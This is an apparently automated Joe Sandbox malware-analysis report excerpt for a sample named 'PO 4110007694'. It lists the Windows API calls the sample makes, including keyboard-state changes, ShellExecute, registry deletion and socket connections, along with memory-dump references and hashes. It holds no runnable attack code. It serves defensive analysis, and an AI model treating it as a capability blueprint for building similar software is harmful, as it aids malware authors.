                                                                    • Instruction Fuzzy Hash: CE315332900205EBCF00DFA4DC89BAE7778EF45710F2441A9E904DB256D7309E11DB60
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00C961EB
                                                                    • GetDC.USER32(00000000), ref: 00C961F3
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C961FE
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00C9620A
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C96246
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C96257
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C96291
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C962B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 4444c65f614008e1d4c47511c42a105d42721a1a3ed51537e4b8342cbb28ec4a
                                                                    • Instruction ID: d62c92213ec2e4f95ad69bde290e27cd2177264f5b14a9fa1dda9663884c46c8
                                                                    • Opcode Fuzzy Hash: 4444c65f614008e1d4c47511c42a105d42721a1a3ed51537e4b8342cbb28ec4a
                                                                    • Instruction Fuzzy Hash: E9316D72201614BFEF118F60CC8AFEA3BA9EF49765F044066FE08DA191C6759D52CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: 50203e17267c3082cc1893b79dfda415ca5ea9cb36eaa1c89a5ad3c6da24aeb6
                                                                    • Instruction ID: 1d42c36059b607c3df27dce4205f1c19e50c5ff9a57d01e33851d05fe3bb6350
                                                                    • Opcode Fuzzy Hash: 50203e17267c3082cc1893b79dfda415ca5ea9cb36eaa1c89a5ad3c6da24aeb6
                                                                    • Instruction Fuzzy Hash: 9E21F0616012267FE2347626ADC2FFB739CAE5139CF084020FD05D6643EB65DF91D2A1
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                      • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                    • _wcstok.LIBCMT ref: 00C7EC94
                                                                    • _wcscpy.LIBCMT ref: 00C7ED23
                                                                    • _memset.LIBCMT ref: 00C7ED56
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 774024439-3081909835
                                                                    • Opcode ID: a5262432dc4ddc3185e32d9dc9effda73e396588e0eee43b1f5a3418bf57495f
                                                                    • Instruction ID: f221e7351baf5345996c7a027753f7bdd997ee66728ec72efdd78e0da62365ae
                                                                    • Opcode Fuzzy Hash: a5262432dc4ddc3185e32d9dc9effda73e396588e0eee43b1f5a3418bf57495f
                                                                    • Instruction Fuzzy Hash: A1C17271508300DFC724EF24C855A9AB7E4FF8A310F10896DF899972A2DB31ED45EB82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dc5a5b969169d6b6907fc238d08bd80753ff48f9d2fac5192ff4cf3fe1278d92
                                                                    • Instruction ID: db8eebb2e178521de9552a03f9829104710d0c920a3bd47e8da2b5e061099cfc
                                                                    • Opcode Fuzzy Hash: dc5a5b969169d6b6907fc238d08bd80753ff48f9d2fac5192ff4cf3fe1278d92
                                                                    • Instruction Fuzzy Hash: 82716030900109EFDB04CF59CC49AFEBB79FF86710F188159FA15AA251C734AA51DFA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d20bb73e2be5e6731296bf5bd4cc74b77c79f1604883ac7991ae6b7451b7da9c
                                                                    • Instruction ID: a37be1d37d29a41b246be232c7596b8cd41d874739b9347925f5c8b3a1db61f8
                                                                    • Opcode Fuzzy Hash: d20bb73e2be5e6731296bf5bd4cc74b77c79f1604883ac7991ae6b7451b7da9c
                                                                    • Instruction Fuzzy Hash: 4261AD71208300ABC710FB24CC96FAFB7A8EF85718F10491DF5559B292DA30EE45E796
                                                                    APIs
                                                                    • IsWindow.USER32(017B5A08), ref: 00C9B3EB
                                                                    • IsWindowEnabled.USER32(017B5A08), ref: 00C9B3F7
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C9B4DB
                                                                    • SendMessageW.USER32(017B5A08,000000B0,?,?), ref: 00C9B512
                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00C9B54F
                                                                    • GetWindowLongW.USER32(017B5A08,000000EC), ref: 00C9B571
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C9B589
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    • Opcode ID: ed290c370ca3eeffe84c011cdda6ecd4d8fefc5625aaccf45e75308e8aa63f91
                                                                    • Instruction ID: 94ca613409c7a91fefeea44c95183d5ab380d3942bb4d7480c6dc14c9bb66deb
                                                                    • Opcode Fuzzy Hash: ed290c370ca3eeffe84c011cdda6ecd4d8fefc5625aaccf45e75308e8aa63f91
                                                                    • Instruction Fuzzy Hash: A0718C34600204FFDF209F65E998FBA7BB9EF09300F14415AFA65972A2C731AE51EB50
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C8F448
                                                                    • _memset.LIBCMT ref: 00C8F511
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00C8F556
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                      • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                    • GetProcessId.KERNEL32(00000000), ref: 00C8F5CD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C8F5FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                    • String ID: @
                                                                    • API String ID: 3522835683-2766056989
                                                                    • Opcode ID: 86c5eefd8b6fa2606b19a6729605239b8c1f35ef9c03bf101a92d0e666a065df
                                                                    • Instruction ID: be345055efb5fb890140dd9b7801efc3b2a839cf868b9d2d01ae84178658aea1
                                                                    • Opcode Fuzzy Hash: 86c5eefd8b6fa2606b19a6729605239b8c1f35ef9c03bf101a92d0e666a065df
                                                                    • Instruction Fuzzy Hash: D361BE71A006199FCB14EFA4C4919AEBBF4FF49314F14806DE855AB391CB30EE42DB94
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00C70F8C
                                                                    • GetKeyboardState.USER32(?), ref: 00C70FA1
                                                                    • SetKeyboardState.USER32(?), ref: 00C71002
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C71030
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C7104F
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C71095
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C710B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: b6235255fa92c67c1f65daeb39d4568c949b64a83fb0b10cd1a31e93afd81d5c
                                                                    • Instruction ID: 39283a9e82c56a8808e7a8ade612280ce40b1cb6e52d331219abe977f64721ba
                                                                    • Opcode Fuzzy Hash: b6235255fa92c67c1f65daeb39d4568c949b64a83fb0b10cd1a31e93afd81d5c
                                                                    • Instruction Fuzzy Hash: 8351F4605047D57EFB3646788C09BBABEA95B06304F0CC589E5EC898C3C2E8EED5D751
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 00C70DA5
                                                                    • GetKeyboardState.USER32(?), ref: 00C70DBA
                                                                    • SetKeyboardState.USER32(?), ref: 00C70E1B
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C70E47
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C70E64
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C70EA8
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C70EC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: dff2e2c084fd735757367873e8dd13371759cbe69381bd28e6c43b6a8c5b9b96
                                                                    • Instruction ID: 4d1257bde44a601d1da64ff4f4565e7db2138ef6ee2b16668abd4c67b735e523
                                                                    • Opcode Fuzzy Hash: dff2e2c084fd735757367873e8dd13371759cbe69381bd28e6c43b6a8c5b9b96
                                                                    • Instruction Fuzzy Hash: C551D4A05447D5BDFB3287648C45B7ABFA96B06300F18C88DF1EC864C3D395AE98E750
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsncpy$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 2945705084-0
                                                                    • Opcode ID: 92c03874f926b042757d524cd9cf0d48801f545a1882848549ab80ffb2854ed9
                                                                    • Instruction ID: 693b234e797d8a55856c5634a1edf2f235b61a9fa8c0936c9766de9d72353471
                                                                    • Opcode Fuzzy Hash: 92c03874f926b042757d524cd9cf0d48801f545a1882848549ab80ffb2854ed9
                                                                    • Instruction Fuzzy Hash: C841A475D2061476CB15EBB48C86ACFB3B89F04310F508966F519E3221FB34E356D7AA
                                                                    APIs
                                                                      • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C73697,?), ref: 00C7468B
                                                                      • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C73697,?), ref: 00C746A4
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00C736B7
                                                                    • _wcscmp.LIBCMT ref: 00C736D3
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00C736EB
                                                                    • _wcscat.LIBCMT ref: 00C73733
                                                                    • SHFileOperationW.SHELL32(?), ref: 00C7379F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 1377345388-1173974218
                                                                    • Opcode ID: 71fd4e04a2fb9a6ed638af5ccf381b53714660913aff1136384597b930cc2b41
                                                                    • Instruction ID: 0d9f67610b6ed8bde24fe0b4055bef6185da656cacecb82af0432503943d0caf
                                                                    • Opcode Fuzzy Hash: 71fd4e04a2fb9a6ed638af5ccf381b53714660913aff1136384597b930cc2b41
                                                                    • Instruction Fuzzy Hash: CF418E71108385AAC755EF64C841ADFB7E8EF89390F00492EB49AC3251EB34D789E752
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C972AA
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C97351
                                                                    • IsMenu.USER32(?), ref: 00C97369
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C973B1
                                                                    • DrawMenuBar.USER32 ref: 00C973C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                    • String ID: 0
                                                                    • API String ID: 3866635326-4108050209
                                                                    • Opcode ID: fa09a5bf199e4a9156f301a8893d90211ad780e83f6fb349f7355ce22833cee0
                                                                    • Instruction ID: b7f1d3ef21a6bac3b76e5b4fadf4fb6523504cb14701058be773a82484fb9a20
                                                                    • Opcode Fuzzy Hash: fa09a5bf199e4a9156f301a8893d90211ad780e83f6fb349f7355ce22833cee0
                                                                    • Instruction Fuzzy Hash: 2F411675A55208EFDF20DF50D888A9EBBB8FB05310F14862AFD1597260D730AE50EB50
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C90FD4
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C90FFE
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00C910B5
                                                                      • Part of subcall function 00C90FA5: RegCloseKey.ADVAPI32(?), ref: 00C9101B
                                                                      • Part of subcall function 00C90FA5: FreeLibrary.KERNEL32(?), ref: 00C9106D
                                                                      • Part of subcall function 00C90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C91090
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C91058
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 395352322-0
                                                                    • Opcode ID: bb0b47a0c2937602c7ebd0063f32249babb5a4b4c84d9ccbb4d836034f6dbc9f
                                                                    • Instruction ID: 299d30d8661cb0e6cc9f0331c195593baf1b0d79c9737f619410e2786ee646db
                                                                    • Opcode Fuzzy Hash: bb0b47a0c2937602c7ebd0063f32249babb5a4b4c84d9ccbb4d836034f6dbc9f
                                                                    • Instruction Fuzzy Hash: 75310C71901109BFDF159F90DC8EAFFB7BCEF08300F14116AE912E2151EA759F859AA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C962EC
                                                                    • GetWindowLongW.USER32(017B5A08,000000F0), ref: 00C9631F
                                                                    • GetWindowLongW.USER32(017B5A08,000000F0), ref: 00C96354
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C96386
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C963B0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00C963C1
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C963DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: b9e0198513f6277791b929729005e9580074860a7c1695cbe83e38b1c4b85e53
                                                                    • Instruction ID: 1064cbef8cfb62fecf522721207b5a163cef01804cc4fad62ccda8c0794bd47f
                                                                    • Opcode Fuzzy Hash: b9e0198513f6277791b929729005e9580074860a7c1695cbe83e38b1c4b85e53
                                                                    • Instruction Fuzzy Hash: EE31EE30644250AFDB218F29DC89F5937E1BB4A724F1901AAF521DB2F2CB71A941AB51
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DB2E
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DB54
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00C6DB57
                                                                    • SysAllocString.OLEAUT32(?), ref: 00C6DB75
                                                                    • SysFreeString.OLEAUT32(?), ref: 00C6DB7E
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00C6DBA3
                                                                    • SysAllocString.OLEAUT32(?), ref: 00C6DBB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 8b8afbcacc3dcc883f523f5b1e9dc0b64399231b6bc34561da2e3016e2b6562c
                                                                    • Instruction ID: b558aefe60fad080c8f6e3b76a4bc524530c39d3e658a7fa0025557d92102f61
                                                                    • Opcode Fuzzy Hash: 8b8afbcacc3dcc883f523f5b1e9dc0b64399231b6bc34561da2e3016e2b6562c
                                                                    • Instruction Fuzzy Hash: 9C21C732B00219AFDF20DFA9DC88DBF73ACEB49360B11816AF915DB250DA70DD418764
                                                                    APIs
                                                                      • Part of subcall function 00C87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C87DB6
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C861C6
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C861D5
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C8620E
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00C86217
                                                                    • WSAGetLastError.WSOCK32 ref: 00C86221
                                                                    • closesocket.WSOCK32(00000000), ref: 00C8624A
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C86263
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                    • String ID:
